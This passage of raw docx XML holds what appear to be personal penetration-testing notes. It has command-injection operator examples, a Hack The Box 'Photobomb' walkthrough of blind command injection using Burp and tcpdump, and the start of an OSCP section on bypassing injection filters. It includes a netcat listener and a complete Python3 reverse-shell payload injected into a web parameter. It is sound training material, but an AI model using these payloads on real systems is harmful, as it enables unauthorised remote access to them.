          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 &amp;&amp; id → runs id only if ping succeeds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 || id → runs id only if ping fails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 $(id) → runs id and inserts its output as part of the command.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o81p9eb4bd7" w:id="123"/>
      <w:bookmarkEnd w:id="123"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(BLIND) Command Injection for downloading photos:</w:t>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t xml:space="preserve">For the Photobomb easy HTB, when downloading photos, we see three parameters in the Burpsuite request: photo, filetype, dimensions. We can try command injection. </w:t>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ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="578" name="image484.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image484.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId296"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2019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CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, send the request to the Repeater Tab so we can try things easier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we attempt to test for a command injection vulnerability by entering a semi-colon (which is a delimiter for commands in Bash as well as most scripting languages) into each field, followed by the command id</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The application does not return any useful output within the HTTP response, so a different technique is required for testing. Doesn't mean that the commands aren't vulnerable, it just means that it doesn't show any output so maybe it involves </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blind command injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we don't see any visible output of confirmation!</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="413" name="image86.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image86.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297"/>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DD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -ni tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to edit the command that we are attempting to inject to a ping command, which if successful will send ICMP packets to the specified address. To capture such packets, we set up a tcpdump for all ICMP traffic on the tun0 interface of our local machine, which is by default used by our lab VPN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD5">
      <w:pPr>
        <w:ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1943100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="450" name="image154.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image154.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId298"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="194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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also make sure to account for the spaces and any other special characters in our payload by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encoding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command by selecting it and pressing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the BurpSuite repeater, so as to ensure the application properly processes it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command (before URL-encoding) is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" limits the number of ping requests to 3. Default runs it indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your HOST IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We attempt pasting our payload into all three of the parameters, one at a time, until we see the packets on our tcpdump. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows us to check which parameter is vulnerable to command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="164" name="image155.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image155.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29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DDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get the ICMP packets for the filetype parameter!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successful blind command injection!</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can use this command injection to get a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to set up a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to try out different </w:t>
      </w:r>
      <w:hyperlink r:id="rId300">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">payloads </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">until one gives us a callback to our listener. After some testing, we try out a Python3 payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export RHOST="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">";export RPORT=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it (select the text inside Repeater and then press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to ensure the application passes the request properly; the final POST request looks as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3746500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="240" name="image233.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image233.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3746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E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the RHOST and RPORT with the correct values for you. And remember that that RHOST is going to be your local IP! Not the target IP. Since this is a reverseshell. </w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DEC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6486an83jfcw" w:id="124"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bypass command injection filters</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (9.4.1. OS Command Injection), we found that an application allowed for command injection, but only for commands starting with "git", so we learned how to bypass that.</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications often need to interact with the underlying operating system, such as when a file is created through a file upload mechanism. Web applications should always offer specific APIs or functionalities that use prepared commands for the interaction with the system. Prepared commands provide a set of functions to the underlying system that cannot be changed by user input. However, these APIs and functions are often very time consuming to plan and develop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes a web application needs to address a multitude of different cases, and a set of predefined functions can be too inflexible. In these cases, web developers often tend to directly accept user input, then sanitize it. This means that user input is filtered for any command sequences that might try to change the application's behavior for malicious purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this demonstration, let's review the "Mountain Vaults" web application, running on port 8000 on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUNTAIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> system. We can open it in our browser by navigating to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.189:8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1816100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 23: Modified Web Content and new Input Textbox" id="248" name="image249.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 23: Modified Web Content and new Input Textbox" id="0" name="image249.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
